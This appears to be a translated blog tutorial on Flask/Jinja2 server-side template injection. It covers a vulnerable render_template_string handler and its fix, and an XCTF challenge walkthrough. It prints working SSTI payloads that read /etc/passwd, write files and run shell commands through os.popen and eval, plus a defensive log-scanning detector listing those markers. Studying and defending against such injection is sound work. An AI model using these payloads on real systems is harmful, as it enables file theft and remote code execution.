Flask template injection
2022-07-19 02:36:00 【jjj34】
Reference link: Learning Flask template injection from scratch - FreeBuf (network security industry portal)
Catalog
- Flask basics
- Template injection
  - 1. XSS injection (the incorrect code is as follows)
  - 2. SSTI file read / command execution
- Example
  - 1. First, determine whether template injection exists
  - 2. Explore the available methods
    - 1. Find <type 'file'>, to prepare for file reading
    - 2. Keep looking for <class 'site._Printer'>, to prepare for command execution
Flask basics
Let's look at a short piece of Python code first:

```python
from flask import Flask

app = Flask(__name__)

@app.route('/index/')
def hello_world():
    return 'hello world'
```

1. route:
route is a decorator; its job is to bind a function to a URL.
In the sample code, when 127.0.0.1/index/ is accessed, Flask returns hello world.
2. Rendering methods
Flask has two rendering methods.
1. render_template
render_template() renders a specified file, for example:

```python
return render_template('index.html')
```

2. render_template_string
render_template_string() renders a string, for example:

```python
html = '<h1> This is index page </h1>'
return render_template_string(html)
```

3. Use of templates
Flask uses Jinja2 as its rendering engine.
Usage: create a templates folder in the root directory of the site to store the HTML files, i.e. the template files.
test.py

```python
from flask import Flask, url_for, redirect, render_template, render_template_string

app = Flask(__name__)

@app.route('/index/')
def user_login():
    # The template variable must be supplied for the heading to be rendered
    return render_template('index.html', content='This is index page')
```

/templates/index.html

```html
<h1>{{ content }}</h1>
```

This page still outputs "This is index page".
{{ }} is the variable delimiter in Jinja2.
Template Injection
Cause: incorrect use of Flask's render_template_string method leads to SSTI.
1. XSS injection
The incorrect code is as follows:

```python
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/test/')
def test():
    code = request.args.get('id')
    # Vulnerable: user input is spliced into the template source before rendering
    html = '''
<h3>%s</h3>
'''%(code)
    return render_template_string(html)
```

Why it is wrong: code is user-controlled. The user controls code through ?id=, which in turn affects <h3>%s</h3> and leads to injection.
When code is </h3> <script>alert(1)</script> <h3>, the rendered markup becomes
<h3> </h3> <script>alert(1)</script> <h3></h3>
causing reflected XSS.
Fix:

```python
@app.route('/test/')
def test():
    code = request.args.get('id')
    # Safe: the template text is constant; code is passed in as a template variable
    return render_template_string('<h1>{{ code }}</h1>', code=code)
```

Here code is passed to the template as a variable and rendered as a plain string, so the problem above does not occur: the original text is output as-is instead of being executed as JavaScript.

2. SSTI file read / command execution
Basic knowledge
In the Jinja2 template engine, {{ }} is the variable delimiter. Not only can variables be passed through {{ }}; some simple expressions can also be evaluated. For example:

```python
@app.route('/test/')
def test():
    code = request.args.get('id')
    # Vulnerable: user input becomes part of the template source
    html = '''
<h3>%s</h3>
'''%(code)
    return render_template_string(html)
```

In this code, when the user enters ?id={{2*4}}, the following appears (the expression is evaluated and the page renders 8):
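The vulnerable handler and the fixed one side by side, driven with Flask's test client so the difference is observable. This is an added example, not code from the original post; the route names /vuln/ and /safe/ and the render() helper are chosen here.

```python
# Added example (not from the original post): vulnerable vs. fixed handler.
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route('/vuln/')
def vuln():
    # Vulnerable: user input becomes part of the template SOURCE, so Jinja2
    # evaluates any {{ ... }} the user supplies (the page's "incorrect code").
    code = request.args.get('id', '')
    html = '<h3>%s</h3>' % code
    return render_template_string(html)

@app.route('/safe/')
def safe():
    # Fixed: the template is a constant; user input is passed as a context
    # variable, so it is treated as data and HTML-escaped on output.
    code = request.args.get('id', '')
    return render_template_string('<h3>{{ code }}</h3>', code=code)

def render(path, payload):
    """Return the response body for GET path?id=payload (demo helper)."""
    with app.test_client() as client:
        return client.get(path, query_string={'id': payload}).get_data(as_text=True)

if __name__ == '__main__':
    for probe in ('{{2*4}}', '<script>alert(1)</script>'):
        print('vuln:', render('/vuln/', probe))   # expression evaluated / markup kept
        print('safe:', render('/safe/', probe))   # literal text, escaped
```

The /safe/ route shows the expected behaviour of the fix: the probe is echoed as text, and angle brackets come back as HTML entities.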

File read
Use subclass number 40, <type 'file'>; the payload is as follows:

```jinja
#1. Get the class object of the string
{{''.__class__}}
#2. Find the base classes
{{''.__class__.__mro__}}
#3. Look for referenceable classes
{{''.__class__.__mro__[2].__subclasses__()}}
# Classes that can be referenced
#{{''.__class__.__mro__[2].__subclasses__()[40]}} -> <type 'file'>
# Usage
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
```

Note that the subclass indices (40, 71) depend on the interpreter version and the loaded modules; <type 'file'> only exists in Python 2.

Command execution
The subclass used is number 71, <class 'site._Printer'>; the payload is as follows:

```jinja
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
```

listdir is a function in os that lists the entries of a path.
Example
Web_python_template_injection from the Attack and Defense World (XCTF)
Link: challenge (xctf.org.cn)
Idea: find the parent class <type 'object'> -> find its subclasses -> find modules related to command execution or file operations.
Solution:
1. First, determine whether template injection exists

Obviously the expression was evaluated; the payload was {{2*4}}.
2. Explore the available methods
The payload is as follows:

```jinja
{{''.__class__.__mro__[2].__subclasses__()}}
```

1. Find <type 'file'> below, to prepare for file reading

As shown in the screenshot, <type 'file'> is available, with index 40.
Note: the index is the position of the class in the list, counting from the first entry, which is 0.
2. Keep looking for <class 'site._Printer'>, to prepare for command execution

<class 'site._Printer'> also exists, with index 71.
3. Obtain the flag
First find the location of the flag:

```jinja
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
```

Read the fl4g file:

```jinja
{{''.__class__.__mro__[2].__subclasses__()[40]('./fl4g').read()}}
```

Supplement
Payload collection

```python
# Get the base class
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object
# Read files
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()
# Write files
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')
# Execute arbitrary commands
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()')
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()')
```

Several magic methods and attributes
__class__ returns the type the object belongs to
__mro__ returns a tuple of the base classes the object inherits from; method resolution follows the order of the tuple.
__base__ returns the base class the object inherits from (__base__ and __mro__ are both used to find base classes)
__subclasses__ every new-style class keeps references to its subclasses; this method returns a list of those references that are still alive
__init__ the class initialisation method
__globals__ a reference to the dictionary holding the global variables of the function
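Seen from the defender's side, the probes used throughout this page (the {{2*4}} check and the __class__/__mro__/__subclasses__ chains) leave a recognisable signature in web-server access logs. The following is an added example, not from the original post: the marker list is an assumption derived from the payloads above, and the log lines are constructed.

```python
# Added example (not from the original post): flag SSTI probes in access logs.
import re
from urllib.parse import unquote_plus

# Assumed marker list, taken from the payloads discussed on this page.
SSTI_MARKERS = ('{{', '{%', '__class__', '__mro__', '__subclasses__',
                '__globals__', 'func_globals', '__init__', 'popen', 'eval(')

# Combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decode_query(path):
    """Return the fully URL-decoded query string of a request path ('' if none)."""
    if '?' not in path:
        return ''
    query = path.split('?', 1)[1]
    # Decode repeatedly: probes are sometimes double-encoded (%257B%257B).
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def find_ssti_probes(lines):
    """Return (ip, raw path, matched markers) for each line that looks like an SSTI probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        query = decode_query(m.group('path'))
        found = [mk for mk in SSTI_MARKERS if mk in query]
        if found:
            hits.append((m.group('ip'), m.group('path'), found))
    return hits

SAMPLE_LOG = [  # constructed sample lines
    '10.0.0.5 - - [19/Jul/2022:02:36:00 +0000] "GET /test/?id=hello HTTP/1.1" 200 23',
    '10.0.0.7 - - [19/Jul/2022:02:36:05 +0000] "GET /test/?id=%7B%7B2*4%7D%7D HTTP/1.1" 200 12',
    '10.0.0.7 - - [19/Jul/2022:02:36:09 +0000] "GET /test/?id=%7B%7B%27%27.__class__.__mro__%5B2%5D.__subclasses__()%7D%7D HTTP/1.1" 200 8192',
    '10.0.0.9 - - [19/Jul/2022:02:37:00 +0000] "GET /index/ HTTP/1.1" 200 11',
]

if __name__ == '__main__':
    for ip, path, markers in find_ssti_probes(SAMPLE_LOG):
        print(ip, path, markers)
```

A hit on {{ alone is a probe, not proof of exploitation; correlate with an unusually large or changed response body on the same request before treating it as an incident.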